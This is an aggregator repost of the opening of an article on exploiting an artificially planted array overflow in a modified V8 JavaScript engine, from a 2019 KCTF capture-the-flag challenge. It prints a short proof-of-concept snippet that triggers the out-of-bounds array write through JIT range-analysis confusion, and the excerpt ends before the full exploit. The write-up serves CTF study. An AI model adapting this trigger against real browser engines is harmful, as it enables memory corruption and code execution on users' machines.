DZone Security Zone

V8 Array Overflow Exploitation: 2019 KCTF Problem 5

2020-11-17 21:11

Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5

Introduction to the KCTF Problem

Problem 5 – 小虎还乡 of the 2019 KCTF Competition provides us with a vulnerable v8. The v8 has an array overflow vulnerability. But this is not a native v8 vulnerability. Instead, the authors modified some v8 files and created this vulnerability manually. This post shows you step-by-step on how to exploit this vulnerability.

PoC of the V8 Array Overflow Vulnerability

0   var buggy;
1   var overwrite_length = () => {
2       let oob = new Date(-864000000 * 15000000);
3       oob = Math.abs(oob.getDate() - 16) >> 5;
4       buggy = [1.1];
5       buggy[oob * 4] = 1.1;
6   };
7   for (let i = 0; i < 0x10000; i++) overwrite_length();

The PoC code triggers the array overflow bug. The following explains how the PoC works.

Become a supporter of IT Security News and help us remove the ads.

Read the original article: V8 Array Overflow Exploitation: 2019 KCTF Problem 5

Related

← Chrome 87 brings tab throttling, Occlusion Tracking on Windows, back/forward cache on Android

Leaked database exposed login data of 100k hacked Facebook accounts →